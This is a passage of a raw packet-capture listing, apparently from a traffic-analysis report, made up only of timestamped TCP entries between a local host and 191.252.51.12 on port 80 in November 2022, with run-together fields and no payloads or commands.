                                                  Nov 30, 2022 00:37:10.969750881 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.969768047 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.969770908 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.969786882 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.969789028 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.969805002 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.969821930 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.969840050 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.969844103 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.969856977 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.969872952 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.969875097 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.969892025 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.969907045 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.969908953 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.969927073 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.969944000 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.969954967 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.969961882 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.969979048 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.969985962 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.969996929 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970014095 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970017910 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970031977 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970048904 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970057964 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970067024 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970074892 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970084906 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970103025 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970119953 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970129013 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970138073 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970155954 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970158100 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970172882 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970190048 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970196009 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970207930 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970226049 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970228910 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970242977 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970261097 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970271111 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970278025 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970294952 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970305920 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970312119 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970323086 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970330000 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970346928 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970361948 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970366001 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970382929 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970400095 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970400095 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970416069 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970432043 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970447063 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970448017 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970463991 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970487118 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970491886 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970503092 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970510960 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970520020 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970536947 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970541000 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970552921 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970570087 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970577002 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970587015 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970593929 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970604897 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970622063 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970638037 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970653057 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970654964 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970671892 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970679045 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970690012 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970700026 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970707893 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970725060 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970741987 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970742941 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970762014 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970777035 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970777988 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970794916 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970812082 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970828056 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970828056 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970844030 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970860958 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970868111 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970890045 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970907927 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970909119 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970927000 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970931053 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970943928 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970957994 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.970961094 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970978975 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.970995903 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971009970 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971014977 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971033096 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971035004 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971050024 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971066952 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971076012 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971085072 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971101999 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971118927 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971120119 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971138954 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971152067 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971155882 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971174002 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971184015 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971193075 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971208096 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971210957 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971229076 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971246004 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971246004 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971263885 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971280098 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971282959 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971302032 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971318960 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971328974 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971335888 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971354008 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971364021 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971370935 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971390009 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971393108 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971406937 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971422911 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971431017 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971440077 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971448898 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971457958 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971474886 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971491098 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971508026 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971508026 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971524954 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971530914 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971543074 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971560001 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971560001 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971576929 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971592903 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971602917 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971609116 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971626043 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971640110 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971642971 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971659899 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971659899 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971677065 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971693993 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971709013 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971712112 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971728086 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971744061 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971754074 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971760988 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971772909 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971777916 CET8049698191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:10.971811056 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:10.971829891 CET4969880192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.039968014 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040028095 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040050030 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040071964 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040092945 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040115118 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040138960 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040143967 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040160894 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040177107 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040183067 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040204048 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040205002 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040225029 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040246964 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040267944 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040268898 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040288925 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040298939 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040312052 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040334940 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040334940 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040361881 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040385962 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040390968 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040406942 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040426016 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040430069 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040452003 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040473938 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040496111 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040498972 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040518045 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040529966 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040540934 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040554047 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040563107 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040584087 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040605068 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040606022 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040627003 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040648937 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040671110 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040692091 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040714025 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040719986 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040738106 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040755987 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040759087 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040779114 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040781021 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040807009 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040828943 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040829897 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040853024 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040869951 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040875912 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040898085 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040920019 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040927887 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040941954 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040965080 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.040966988 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.040987015 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041009903 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041014910 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041033030 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041052103 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041054010 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041075945 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041099072 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041099072 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041121960 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041145086 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041168928 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041176081 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041192055 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041215897 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041230917 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041238070 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041260958 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041260004 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041280031 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041284084 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041306973 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041328907 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041351080 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041373968 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041383028 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041397095 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041419029 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041441917 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041448116 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041465044 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041471958 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041487932 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041508913 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041512966 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041532040 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041554928 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041557074 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041579008 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041599989 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041615963 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041646004 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041672945 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041693926 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041702032 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041723967 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041729927 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041759014 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041788101 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041816950 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041846991 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041872978 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041882992 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041902065 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041929007 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041929960 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041954041 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.041960001 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.041990042 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042006016 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.042018890 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042048931 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042067051 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.042077065 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042105913 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042129040 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.042134047 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042164087 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042192936 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042223930 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042254925 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042256117 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.042284012 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042294025 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.042311907 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042340040 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042356014 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.042370081 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042398930 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042426109 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042428017 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.042454004 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042484045 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042512894 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042541027 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042552948 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.042568922 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042593002 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.042597055 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042624950 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042653084 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.042654037 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042681932 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042709112 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.042711020 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042740107 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042763948 CET4969780192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:11.042767048 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042795897 CET8049697191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:11.042823076 CET8049697191.252.51.12192.168.2.3
